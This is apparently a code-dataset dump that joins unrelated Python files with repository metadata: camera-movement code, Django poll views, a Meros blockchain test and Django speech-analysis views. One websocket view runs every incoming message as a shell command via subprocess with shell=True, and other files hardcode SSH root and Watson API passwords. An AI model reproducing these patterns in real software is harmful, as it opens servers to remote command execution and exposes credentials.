end_t = self.cmc_random_uniform("t_duration") + start_t
ori_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc, LinFunc])
self.ori_angle_func = ori_func(start_val, end_val, start_t, end_t)
# - movement function for distance attribute
if np.random.uniform() >= prob_dist:
self.distance_func = ConstFunc(self.start_distance, None, None, None)
else:
start_val = self.start_distance
end_val = self.cmc_random_uniform("delta_dist") + start_val
start_t = self.cmc_random_uniform("t_start")
end_t = self.cmc_random_uniform("t_duration") + start_t
distance_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc])
self.distance_func = distance_func(start_val, end_val, start_t, end_t)
# TODO: use config
def cmc_random_uniform(self, parameter):
assert self.movement_complexity > 0
return np.random.uniform(
camera_movement_constraints[parameter]["min"][self.movement_complexity - 1],
camera_movement_constraints[parameter]["max"][self.movement_complexity - 1]
)
@property
def elev_angle(self): return np.clip(self.elev_angle_func.get_value(self.t), 0, 89).item()
@property
def ori_angle(self): return self.ori_angle_func.get_value(self.t) % 360
@property
def distance(self): return np.clip(self.distance_func.get_value(self.t), 0.8, 5.0).item()
def stereo_deviation(self, vec, stereo_position):
deviation_vec = torch.cross(
(self.base_lookat - self.base_pos).double(), self.start_up_vec.double()
).float()
deviation_vec *= self.stereo_pair_dist / (2 * torch.linalg.norm(deviation_vec))
return vec - deviation_vec if stereo_position == "left" else vec + deviation_vec
@property
def base_pos(self):
"""
Calculate the camera position from given lookat position, camera distance
and elevation/orientation angle (in degrees)
"""
cam_x = np.cos(self.ori_angle * np.pi / 180.) * np.cos(self.elev_angle * np.pi / 180.)
cam_y = np.sin(self.ori_angle * np.pi / 180.) * np.cos(self.elev_angle * np.pi / 180.)
cam_z = np.sin(self.elev_angle * np.pi / 180.)
cam_xyz = torch.tensor([cam_x, cam_y, cam_z])
cam_pos = self.base_lookat + cam_xyz * self.distance
return cam_pos
def get_pos(self, stereo_position="mono"):
pos = self.base_pos
return pos if stereo_position == "mono" else self.stereo_deviation(pos, stereo_position)
def get_lookat(self, stereo_position="mono"):
lookat = self.base_lookat
return lookat if stereo_position == "mono" else self.stereo_deviation(lookat, stereo_position)
def get_posed_name(self, stereo_position="mono"):
return f"{self.name}_{stereo_position}"
def step(self, dt=None):
dt = dt or self.cam_dt
self.t += dt
| 45.962687 | 119 | 0.670401 | 5,884 | 0.95535 | 0 | 0 | 867 | 0.14077 | 0 | 0 | 1,156 | 0.187693 |
63785e4a628f813a35572751a22a0fef1e469f30 | 23,016 | py | Python | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | import copy
import uuid
import json
from datetime import timedelta
from dateutil.parser import parse
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.views import auth_logout
from django.core.paginator import Paginator
from django.db.models import Count
from django.http import Http404
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.utils.timezone import now
from steemconnect.client import Client
from steemconnect.operations import Comment
from base.utils import add_tz_info
from .models import Question, Choice, User, VoteAudit
from communities.models import Community
from .utils import (
get_sc_client, get_comment_options, get_top_dpollers,
get_top_voters, validate_input, add_or_get_question, add_choices,
get_comment, fetch_poll_data, sanitize_filter_value)
from lightsteem.client import Client as LightsteemClient
TEAM_MEMBERS = [
{
"username": "emrebeyler",
"title": "Developer",
},
{
"username": "isnochys",
"title": "Joker",
},
{
"username": "bluerobo",
"title": "Curator",
},
{
"username": "tolgahanuzun",
"title": "Developer",
}
]
def index(request):
query_params = {
"expire_at__gt": now(),
"is_deleted": False,
}
# ordering by new, trending, or promoted.
order_by = "-id"
if request.GET.get("order"):
if request.GET.get("order") == "trending":
order_by = "-voter_count"
elif request.GET.get("order") == "promoted":
order_by = "-promotion_amount"
query_params.update({
"promotion_amount__gt": float(0.000),
})
questions = Question.objects.filter(**query_params).order_by(order_by)
paginator = Paginator(questions, 10)
promoted_polls = Question.objects.filter(
expire_at__gt=now(),
promotion_amount__gt=float(0.000),
).order_by("-promotion_amount")
if len(promoted_polls):
promoted_poll = promoted_polls[0]
else:
promoted_poll = None
page = request.GET.get('page')
polls = paginator.get_page(page)
stats = {
'poll_count': Question.objects.all().count(),
'vote_count': Choice.objects.aggregate(
total_votes=Count('voted_users'))["total_votes"],
'user_count': User.objects.all().count(),
'top_dpollers': get_top_dpollers(),
'top_voters': get_top_voters(),
}
return render(request, "index.html", {
"polls": polls, "stats": stats, "promoted_poll": promoted_poll})
def sc_login(request):
if 'access_token' not in request.GET:
login_url = get_sc_client().get_login_url(
redirect_uri=settings.SC_REDIRECT_URI,
scope="login,comment,comment_options",
)
return redirect(login_url)
user = authenticate(access_token=request.GET.get("access_token"))
if user is not None:
if user.is_active:
login(request, user)
try:
# Trigger update on user info (SP, rep, etc.)
user.update_info()
except Exception as e:
user.update_info_async()
request.session["sc_token"] = request.GET.get("access_token")
if request.session.get("initial_referer"):
return redirect(request.session["initial_referer"])
return redirect("/")
else:
return HttpResponse("Account is disabled.")
else:
return HttpResponse("Invalid login details.")
def sc_logout(request):
auth_logout(request)
return redirect("/")
def create_poll(request):
if not request.user.is_authenticated:
return redirect('login')
if request.method == 'POST':
form_data = copy.copy(request.POST)
if 'sc_token' not in request.session:
return redirect("/")
error, question, choices, expire_at, permlink, days, tags, \
allow_multiple_choices = validate_input(request)
if error:
form_data.update({
"answers": request.POST.getlist("answers[]"),
"expire_at": request.POST.get("expire-at"),
"reward_option": request.POST.get("reward-option"),
"allow_multiple_choices": request.POST.get(
"allow-multiple-choices"),
})
return render(request, "add.html", {"form_data": form_data})
if (Question.objects.filter(
permlink=permlink, username=request.user)).exists():
messages.add_message(
request,
messages.ERROR,
"You have already a similar poll."
)
return redirect('create-poll')
# add question
question = add_or_get_question(
request,
question,
permlink,
days,
allow_multiple_choices
)
question.save()
# add answers attached to it
add_choices(question, choices)
# send it to the steem blockchain
sc_client = Client(access_token=request.session.get("sc_token"))
comment = get_comment(request, question, choices, permlink, tags)
comment_options = get_comment_options(
comment,
reward_option=request.POST.get("reward-option")
)
if not settings.BROADCAST_TO_BLOCKCHAIN:
resp = {}
else:
resp = sc_client.broadcast([
comment.to_operation_structure(),
comment_options.to_operation_structure(),
])
if 'error' in resp:
if 'The token has invalid role' in resp.get("error_description"):
# expired token
auth_logout(request)
return redirect('login')
messages.add_message(
request,
messages.ERROR,
resp.get("error_description", "error")
)
question.delete()
return redirect('create-poll')
return redirect('detail', question.username, question.permlink)
return render(request, "add.html")
def edit_poll(request, author, permlink):
if not request.user.is_authenticated:
return redirect('login')
try:
poll = Question.objects.get(
permlink=permlink,
username=author,
)
except Question.DoesNotExist:
raise Http404
if author != request.user.username:
raise Http404
if request.method == "GET":
poll_data = fetch_poll_data(poll.username, poll.permlink)
tags = poll_data.get("tags", [])
tags = [tag for tag in tags if tag not in settings.DEFAULT_TAGS]
form_data = {
"question": poll.text,
"description": poll.description,
"answers": [c.text for c in Choice.objects.filter(question=poll)],
"expire_at": poll.expire_at_humanized,
"tags": ",".join(tags),
"allow_multiple_choices": poll.allow_multiple_choices
}
if request.method == 'POST':
form_data = copy.copy(request.POST)
if 'sc_token' not in request.session:
return redirect("/")
error, question, choices, expire_at, _, days, tags, \
allow_multiple_choices = validate_input(request)
if tags:
tags = settings.DEFAULT_TAGS + tags
else:
tags = settings.DEFAULT_TAGS
permlink = poll.permlink
if error:
form_data.update({
"answers": request.POST.getlist("answers[]"),
"expire_at": request.POST.get("expire-at"),
"allow_multiple_choices": request.POST.get(
"allow-multiple-choices"),
})
return render(request, "edit.html", {"form_data": form_data})
# add question
question = add_or_get_question(
request,
question,
permlink,
days,
allow_multiple_choices
)
question.save()
# add answers attached to it
add_choices(question, choices, flush=True)
# send it to the steem blockchain
sc_client = Client(access_token=request.session.get("sc_token"))
comment = get_comment(request, question, choices, permlink, tags=tags)
if not settings.BROADCAST_TO_BLOCKCHAIN:
resp = {}
else:
resp = sc_client.broadcast([
comment.to_operation_structure(),
])
if 'error' in resp:
if 'The token has invalid role' in resp.get("error_description"):
# expired token
auth_logout(request)
return redirect('login')
messages.add_message(
request,
messages.ERROR,
resp.get("error_description", "error")
)
question.delete()
return redirect('edit', args=(author, permlink))
return redirect('detail', question.username, question.permlink)
return render(request, "edit.html", {
"form_data": form_data,
})
def detail(request, user, permlink):
if 'after_promotion' in request.GET:
messages.add_message(
request,
messages.SUCCESS,
"Thanks for the promotion. Transfer will be picked up by our "
"systems between 2 and 5 minutes."
)
try:
poll = Question.objects.get(
username=user, permlink=permlink, is_deleted=False)
except Question.DoesNotExist:
raise Http404
rep = sanitize_filter_value(request.GET.get("rep"))
sp = sanitize_filter_value(request.GET.get("sp"))
age = sanitize_filter_value(request.GET.get("age"))
post_count = sanitize_filter_value(request.GET.get("post_count"))
community = request.GET.get("community")
# check the existance of the community
try:
Community.objects.get(name=community)
except Community.DoesNotExist:
community = None
if community:
messages.add_message(
request,
messages.INFO,
f"Note: Only showing {community} members' choices."
)
choice_list, choice_list_ordered, choices_selected, filter_exists, \
all_votes = poll.votes_summary(
age=age,
rep=rep,
sp=sp,
post_count=post_count,
stake_based=request.GET.get("stake_based") == "1",
sa_stake_based=request.GET.get("stake_based") == "2",
community=community,
)
user_votes = Choice.objects.filter(
voted_users__username=request.user.username,
question=poll,
).values_list('id', flat=True)
if 'audit' in request.GET:
return poll.audit_response(choice_list)
return render(request, "poll_detail.html", {
"poll": poll,
"choices": choice_list,
"choices_ordered": choice_list_ordered,
"total_votes": all_votes,
"user_votes": user_votes,
"show_bars": choices_selected > 1,
"filters_applied": filter_exists,
"communities": Community.objects.all().order_by("-id"),
})
def vote(request, user, permlink):
if request.method != "POST":
raise Http404
# django admin users should not be able to vote.
if not request.session.get("sc_token"):
redirect('logout')
try:
poll = Question.objects.get(username=user, permlink=permlink)
except Question.DoesNotExist:
raise Http404
if not request.user.is_authenticated:
return redirect('login')
if poll.allow_multiple_choices:
choice_ids = request.POST.getlist("choice-id")
else:
choice_ids = [request.POST.get("choice-id"),]
# remove noise
choice_ids = [x for x in choice_ids if x is not None]
additional_thoughts = request.POST.get("vote-comment", "")
if not len(choice_ids):
messages.add_message(
request,
messages.ERROR,
"You need to pick a choice to vote."
)
return redirect("detail", poll.username, poll.permlink)
if Choice.objects.filter(
voted_users__username=request.user,
question=poll).exists():
messages.add_message(
request,
messages.ERROR,
"You have already voted for this poll!"
)
return redirect("detail", poll.username, poll.permlink)
if not poll.is_votable():
messages.add_message(
request,
messages.ERROR,
"This poll is expired!"
)
return redirect("detail", poll.username, poll.permlink)
for choice_id in choice_ids:
try:
choice = Choice.objects.get(pk=int(choice_id))
except Choice.DoesNotExist:
raise Http404
choice_instances = []
for choice_id in choice_ids:
choice = Choice.objects.get(pk=int(choice_id))
choice_instances.append(choice)
# send it to the steem blockchain
sc_client = Client(access_token=request.session.get("sc_token"))
choice_text = ""
for c in choice_instances:
choice_text += f" - {c.text.strip()}\n"
body = f"Voted for \n {choice_text}"
if additional_thoughts:
body += f"\n\n{additional_thoughts}"
comment = Comment(
author=request.user.username,
permlink=str(uuid.uuid4()),
body=body,
parent_author=poll.username,
parent_permlink=poll.permlink,
json_metadata={
"tags": settings.DEFAULT_TAGS,
"app": f"dpoll/{settings.DPOLL_APP_VERSION}",
"content_type": "poll_vote",
"votes": [c.text.strip() for c in choice_instances],
}
)
comment_options = get_comment_options(comment)
if not settings.BROADCAST_TO_BLOCKCHAIN:
resp = {}
else:
resp = sc_client.broadcast([
comment.to_operation_structure(),
comment_options.to_operation_structure(),
])
# Steemconnect sometimes returns 503.
# https://github.com/steemscript/steemconnect/issues/356
if not isinstance(resp, dict):
messages.add_message(
request,
messages.ERROR,
"We got an unexpected error from Steemconnect. Please, try again."
)
return redirect("detail", poll.username, poll.permlink)
# Expected way to receive errors on broadcasting
if 'error' in resp:
messages.add_message(
request,
messages.ERROR,
resp.get("error_description", "error")
)
return redirect("detail", poll.username, poll.permlink)
# register the vote to the database
for choice_instance in choice_instances:
choice_instance.voted_users.add(request.user)
block_id = resp.get("result", {}).get("block_num")
trx_id = resp.get("result", {}).get("id")
# add trx id and block id to the audit log
vote_audit = VoteAudit(
question=poll,
voter=request.user,
block_id=block_id,
trx_id=trx_id
)
vote_audit.save()
for choice_instance in choice_instances:
vote_audit.choices.add(choice_instance)
messages.add_message(
request,
messages.SUCCESS,
"You have successfully voted!"
)
return redirect("detail", poll.username, poll.permlink)
def profile(request, user):
try:
user = User.objects.get(username=user)
except User.DoesNotExist:
raise Http404
polls = user.polls_created
votes = user.votes_casted
poll_count = len(polls)
vote_count = len(votes)
return render(request, "profile.html", {
"user": user,
"polls": polls,
"votes": votes,
"poll_count": poll_count,
"vote_count": vote_count,
})
def team(request):
return render(request, "team.html", {"team_members": TEAM_MEMBERS})
def polls_by_vote_count(request):
end_time = now()
start_time = now() - timedelta(days=7)
if request.GET.get("start_time"):
try:
start_time = add_tz_info(parse(request.GET.get("start_time")))
except Exception as e:
pass
if request.GET.get("end_time"):
try:
end_time = add_tz_info(parse(request.GET.get("end_time")))
except Exception as e:
pass
polls = []
questions = Question.objects.filter(
created_at__gt=start_time,
created_at__lt=end_time)
if request.GET.get("exclude_team_members"):
questions = questions.exclude(username__in=settings.TEAM_MEMBERS)
for question in questions:
vote_count = 0
already_counted_users = []
for choice in question.choices.all():
voted_users = choice.voted_users.all()
for voted_user in voted_users:
if voted_user.pk in already_counted_users:
continue
vote_count += 1
# now, with the multiple choices implemented
# only one choice of a user should be counted, here.
already_counted_users.append(voted_user.pk)
polls.append({"vote_count": vote_count, "poll": question})
polls = sorted(polls, key=lambda x: x["vote_count"], reverse=True)
return render(request, "polls_by_vote.html", {
"polls": polls, "start_time": start_time, "end_time": end_time})
@csrf_exempt
def vote_transaction_details(request):
poll_id = request.POST.get("poll_id")
choices = request.POST.getlist("choices[]")
additional_thoughts = request.POST.get("additional_thoughts")
username = request.POST.get("username")
try:
poll = Question.objects.get(pk=int(poll_id))
except Question.DoesNotExist:
raise Http404
choice_instances = []
for choice_id in choices:
try:
choice = Choice.objects.get(pk=int(choice_id))
except Choice.DoesNotExist:
raise Http404
choice_instances.append(choice)
choice_text = ""
for c in choice_instances:
choice_text += f" - {c.text.strip()}\n"
body = f"Voted for \n {choice_text}"
if additional_thoughts:
body += f"\n\n{additional_thoughts}"
permlink = str(uuid.uuid4())
parent_author = poll.username
parent_permlink = poll.permlink
json_metadata = {
"tags": settings.DEFAULT_TAGS,
"app": f"dpoll/{settings.DPOLL_APP_VERSION}",
"content_type": "poll_vote",
"votes": [c.text.strip() for c in choice_instances],
}
return JsonResponse({
"username": username,
"permlink": permlink,
"title": "",
"body": body,
"json_metadata": json_metadata,
"parent_username": parent_author,
"parent_permlink": parent_permlink,
"comment_options": "",
})
def sync_vote(request):
trx_id = request.GET.get("trx_id")
try:
# block numbers must be integer
block_num = int(request.GET.get("block_num"))
except (TypeError, ValueError):
return HttpResponse('Invalid block ID', status=400)
c = LightsteemClient()
block_data = c.get_block(block_num)
if not block_data:
# block data may return null if it's invalid
return HttpResponse('Invalid block ID', status=400)
vote_tx = None
for transaction in block_data.get("transactions", []):
if transaction.get("transaction_id") == trx_id:
vote_tx = transaction
break
if not vote_tx:
return HttpResponse('Invalid transaction ID', status=400)
vote_op = None
for op_type, op_value in transaction.get("operations", []):
if op_type != "comment":
continue
vote_op = op_value
if not vote_op:
return HttpResponse("Couldn't find valid vote operation.", status=400)
# validate json metadata
if not vote_op.get("json_metadata"):
return HttpResponse("json_metadata is missing.", status=400)
json_metadata = json.loads(vote_op.get("json_metadata", ""))
# json_metadata should indicate content type
if json_metadata.get("content_type") != "poll_vote":
return HttpResponse("content_type field is missing.", status=400)
# check votes
votes = json_metadata.get("votes", [])
if not len(votes):
return HttpResponse("votes field is missing.", status=400)
# check the poll exists
try:
question = Question.objects.get(
username=vote_op.get("parent_author"),
permlink=vote_op.get("parent_permlink"),
)
except Question.DoesNotExist:
return HttpResponse("parent_author/parent_permlink is not a poll.", status=400)
# Validate the choice
choices = Choice.objects.filter(
question=question,
)
selected_choices = []
for choice in choices:
for user_vote in votes:
if choice.text == user_vote:
selected_choices.append(choice)
if not selected_choices:
return HttpResponse("Invalid choices in votes field.", status=400)
# check if the user exists in our database
# if it doesn't, create it.
try:
user = User.objects.get(username=vote_op.get("author"))
except User.DoesNotExist:
user = User.objects.create_user(
username=vote_op.get("author"))
user.save()
# check if we already registered a vote from that user
if Choice.objects.filter(
voted_users__username=vote_op.get("author"),
question=question).count() != 0:
return HttpResponse("You have already voted on that poll.", status=400)
# register the vote
for selected_choice in selected_choices:
selected_choice.voted_users.add(user)
# add vote audit entry
vote_audit = VoteAudit(
question=question,
voter=user,
block_id=block_num,
trx_id=trx_id
)
vote_audit.save()
return HttpResponse("Vote is registered to the database.", status=200)
def vote_check(request):
try:
question = Question.objects.get(pk=request.GET.get("question_id"))
except Question.DoesNotExist:
raise Http404
if not request.GET.get("voter_username"):
raise Http404
users = set()
for choice in Choice.objects.filter(question=question):
for voted_user in choice.voted_users.all():
users.add(voted_user.username)
if request.GET.get("voter_username") in users:
return JsonResponse({"voted": True})
else:
return JsonResponse({"voted": False})
| 30.728972 | 87 | 0.60849 | 0 | 0 | 0 | 0 | 1,433 | 0.062261 | 0 | 0 | 4,437 | 0.192779 |
637b49097674b4c3f8587181a185a473471f7b03 | 2,251 | py | Python | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 66 | 2019-01-14T08:39:52.000Z | 2022-01-06T11:39:15.000Z | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 228 | 2019-01-16T15:42:44.000Z | 2022-02-05T07:48:07.000Z | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 19 | 2019-01-14T08:53:04.000Z | 2021-11-03T20:19:28.000Z | #Tests that blocks can't have multiple verification packets for the same transaction.
from typing import Dict, Any
import json
from pytest import raises
from e2e.Libs.Minisketch import Sketch
from e2e.Classes.Transactions.Data import Data
from e2e.Classes.Consensus.VerificationPacket import VerificationPacket
from e2e.Classes.Merit.Blockchain import Block, Blockchain
from e2e.Meros.Meros import MessageType
from e2e.Meros.RPC import RPC
from e2e.Meros.Liver import Liver
from e2e.Tests.Errors import TestError, SuccessError
def MultiplePacketsTest(
rpc: RPC
) -> None:
#Spawn a Blockchain just to set the RandomX key.
_: Blockchain = Blockchain()
vectors: Dict[str, Any]
with open("e2e/Vectors/Merit/MultiplePackets.json", "r") as file:
vectors = json.loads(file.read())
data: Data = Data.fromJSON(vectors["data"])
block: Block = Block.fromJSON(vectors["blockchain"][-1])
def sendDataAndBlock() -> None:
#Send the Data.
if rpc.meros.liveTransaction(data) != rpc.meros.live.recv():
raise TestError("Meros didn't send back the Data.")
rpc.meros.liveBlockHeader(block.header)
rpc.meros.handleBlockBody(block)
msg: bytes = rpc.meros.sync.recv()
if MessageType(msg[0]) != MessageType.SketchHashRequests:
raise TestError("Meros didn't request the packets for this Block.")
packets: Dict[int, VerificationPacket] = {}
for packet in block.body.packets:
packets[Sketch.hash(block.header.sketchSalt, packet)] = packet
#Look up each requested packet and respond accordingly.
for h in range(int.from_bytes(msg[33 : 37], byteorder="little")):
sketchHash: int = int.from_bytes(msg[37 + (h * 8) : 45 + (h * 8)], byteorder="little")
if sketchHash not in packets:
raise TestError("Meros asked for a non-existent Sketch Hash.")
rpc.meros.packet(packets[sketchHash])
try:
if MessageType(rpc.meros.live.recv()[0]) == MessageType.BlockHeader:
raise TestError("Meros added the Block.")
except Exception as e:
if str(e) != "Meros added the Block.":
raise SuccessError()
with raises(SuccessError):
Liver(
rpc,
vectors["blockchain"],
callbacks={
2: sendDataAndBlock
}
).live()
| 32.623188 | 92 | 0.702355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 469 | 0.208352 |
637c926e9fd9828afed3a289b40e1b60ecb64afd | 2,891 | py | Python | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2018年4月17日 @author: encodingl
'''
from django.shortcuts import render
#from dwebsocket.decorators import accept_websocket, require_websocket
from django.http import HttpResponse
import paramiko
from django.contrib.auth.decorators import login_required
from skaccounts.permission import permission_verify
import subprocess
from django.shortcuts import render
from django.template import RequestContext
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
def web_send(group_name,msg):
print("4")
channel_layer = get_channel_layer()
print("5")
print(group_name)
async_to_sync(channel_layer.group_send)(group_name,
{
'type': 'show_in_windows',
'message': msg
}
)
print("6")
class TestWebSend():
def __init__(self,group_name,msg):
self.msg = msg
print(self.msg)
self.group_name = group_name
print(self.group_name)
def sendmsg(self):
print("3")
web_send(self.group_name, self.msg)
print("8")
@login_required()
@permission_verify()
def websocket_index(request):
temp_name = "skworkorders/skworkorders-header.html"
return render(request,'skworkorders/websocket.html', locals())
def exec_command(comm):
hostname = '172.28.28.127'
username = 'root'
password = 'rft420e'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=hostname, username=username, password=password)
stdin, stdout, stderr = ssh.exec_command(comm)
result = stdout.read()
ssh.close()
return result
#@accept_websocket
def echo(request):
temp_name = "skworkorders/skworkorders-header.html"
if not request.is_websocket():#判断是不是websocket连接
try:#如果是普通的http方法
message = request.GET['message']
return HttpResponse(message)
except:
return render(request,'skworkorders/websocket.html', locals())
else:
for message in request.websocket:
cmd = message
print(cmd)
# request.websocket.send(exec_command(cmd))
pcmd = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.STDOUT,shell=True)
while True:
line = pcmd.stdout.readline().strip() #获取内容
print(line)
if line:
request.websocket.send(line)
else:
break
retcode=pcmd.wait()
if retcode==0:
ret_message="执行成功"
else:
ret_message="执行失败"
request.websocket.send(ret_message)
# request.websocket.send(exec_command(cmd))#发送消息到客户端 | 26.522936 | 99 | 0.625735 | 310 | 0.104483 | 0 | 0 | 198 | 0.066734 | 0 | 0 | 645 | 0.217391 |
637cc4770c5d2eb1b7ce98fc871fe7b1224b66d6 | 9,482 | py | Python | src/Analyse/views.py | Hash-It-Out/MeetingMinutes | 73fc4650ca2bacba09ab3d6c0134f175025342d8 | [
"Apache-2.0"
] | 3 | 2021-03-14T23:35:59.000Z | 2021-12-16T12:28:40.000Z | src/Analyse/views.py | Hack-Overflow/HackOverflow | cff0a50c794e2c70ca65be8a8b9c7420e7a1927c | [
"Apache-2.0"
] | null | null | null | src/Analyse/views.py | Hack-Overflow/HackOverflow | cff0a50c794e2c70ca65be8a8b9c7420e7a1927c | [
"Apache-2.0"
] | 2 | 2018-10-06T06:18:22.000Z | 2018-10-06T17:51:39.000Z | from __future__ import print_function
from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth import get_user_model
import os
from django.core.mail import send_mail
import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
import string
from .models import Meeting, MeetingAttendee, Team, upload_audio_path,get_filename_ext
from .FrequencySummarizer import FrequencySummarizer
import json,io
from os.path import join, dirname
from watson_developer_cloud import SpeechToTextV1
from watson_developer_cloud.websocket import RecognizeCallback, AudioSource
import threading
import math
from django.template import Template, Context
from django.http import HttpResponse
# Make it work for Python 2+3 and with Unicode
try:
to_unicode = unicode
except NameError:
to_unicode = str
keywords=[['frontend','front-end','responsive','color','theme','scheme','CSS','HTML','JS','javascript'],#frontend
['script','backend','back-end','database','query','object','script','python'],#backend
['people','business','analyse']]#management
def sttxt(request,filename,textfilepath,textfilename):
kl = []
service = SpeechToTextV1(
username='80a593b1-5a21-4ea4-adb1-e7218fb5a9fa',
password='1RGsVJJw8BlB',
url='https://stream.watsonplatform.net/speech-to-text/api')
models = service.list_models().get_result()
#print(json.dumps(models, indent=2))
model = service.get_model('en-US_NarrowbandModel').get_result()
#print(json.dumps(model, indent=2))
# with open(join(dirname(__file__), filename),'rb') as audio_file:
print(filename)
with open(filename,'rb') as audio_file:
with io.open('data.json', 'w', encoding='utf8') as outfile:
str_ = json.dumps(service.recognize(audio=audio_file,content_type='audio/mp3',speaker_labels=True).get_result(),indent=2)
outfile.write(to_unicode(str_))
outfile.close()
# Read JSON file
with open('data.json') as data_file:
data_loaded = json.load(data_file)
spea = []
l=0
for i in data_loaded['speaker_labels']:
temp = ""
if l == int(i['speaker']):
for z in range(math.floor(i['from']),math.ceil(i['to'])):
for v in data_loaded['results']:
for m in v['alternatives']:
for n in m['timestamps']:
if n[1] >= i['from'] and n[2] <= i['to']:
if temp is not n[0]:
spea.append(n[0])
temp = n[0]
#print(spea)
else:
str1 = ' '.join(spea)
print(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
with io.open(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt", 'a', encoding='utf8') as outfile:
# print("Speaker "+str(l)+": "+str1+"\n")
str_ = outfile.write(" Speaker "+str(l)+": "+str1+"\n")
kl.append("Speaker "+str(l)+": "+str1+"\n")
outfile.close()
l = i['speaker']
del spea[0:len(spea)-1]
str1 = ' '.join(spea)
with io.open(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt", 'a', encoding='utf8') as outfile:
# print("Speaker "+str(l)+": "+str1+"\n")
str_ = outfile.write(" Speaker "+str(l)+": "+str1+"\n")
kl.append("Speaker "+str(l)+": "+str1+"\n")
outfile.close()
u = summary_function(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
print('vvvvvvvvvvvvvvvvvvv summarize VVVVVVVVVVVVVVVv')
print(u)
print('------------------- decisions ------------------------------------')
decision=nltk(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
print(decision)
request.session['summ'] = u
request.session['trans1'] = kl
request.session['deci'] = decision
context={
'summarize':u,
'trans':kl,
}
return render(request,'Analyse/transcript.html',context)
#return render(request,'Analyse/transcript.html',context)
def transcript(request):
context={
'summarize':request.session['summ'],
'trans':request.session['trans1'],
'deci':request.session['deci'],
}
return render(request,'Analyse/transcript.html',context)
def summary_function(textfilepathfinal):
with open(textfilepathfinal, 'r') as myfile:
text=myfile.read().replace('\n','')
fs = FrequencySummarizer()
s = fs.summarize(str(text), 2)
return s
def nltk(textfilepathfinal):
# def nltk(request):
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
with open(textfilepathfinal, 'r') as myfile:
text=myfile.read().replace('\n','')
# text="Decide, the frontend team needs to make the website mobile reponsive decision end"
print(text)
datas=word_tokenize(text)
decision_string = str('')
decision=[]
frontend_score=0
backend_score=0
management_score=0
scores=[['Front-End Team', 0],
['Back-End Team', 0],
['Management Team', 0]]
flag=False # to see if 'Decide' word was said
ps=PorterStemmer() # variable for stemming
final_decisions=[]
# final_decisions=[[0 for x in range(100)] for y in range(100)]
z=0
for i in range(len(datas)):
# print(datas[i]+","+str(flag))
if datas[i].lower() == 'decide':
flag=True
if flag==True and datas[i].lower() == 'decision' and datas[i+1].lower() == "end":
# print("hie")
flag=False
decision_string=decision_string.strip(' ')
print(decision_string)
# now doing the keyword matching using stemming
decision=word_tokenize(decision_string)
print(decision)
for j in range(len(decision)):
if decision[j] not in string.punctuation:
# stemmed_word=ps.stem(decision[j])
# print(stemmed_word)
# now checking if the stemmed word is in any of the keywords ka list and appropriately assigning scores
for x in range(len(keywords)):
for y in range(len(keywords[x])):
# print(str(x)+","+str(y))
if ps.stem(decision[j]).lower() == ps.stem(keywords[x][y]) :
scores[x][1] = scores[x][1]+1
print(scores)
score=[]
score.append(scores[0][1])
score.append(scores[1][1])
score.append(scores[2][1])
notify=score.index(max(score))
notify_team=scores[notify][0]
# final_decisions[z][0]=decision_string
# final_decisions[z][1]=notify_team
final_decisions.append(decision_string)
final_decisions.append(notify_team)
z=z+1
print(notify_team)
decision_string=str('')
if flag==True and datas[i].lower() != 'speaker' and i!=0:
# i=i+1
if datas[i] in string.punctuation:
# if not any(p in datas[i] for p in string.punctuation):
# print(datas[i])
if datas[i] == ":" and datas[i-1].isdigit():
print("in")
else:
decision_string = decision_string + datas[i]
else:
if (datas[i].isdigit() and datas[i+1]== ":") or (i < len(datas) and datas[i] == datas[i+1]):
print("in")
else:
decision_string = decision_string + ' ' + datas[i]
context={
'datas':'hello'
}
# return render(request, "Analyse/nltk.html", context)
# print(final_decisions)
return final_decisions
User=get_user_model()
def handle_uploaded_file(file, filename, foldername):
print("--here--")
print(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
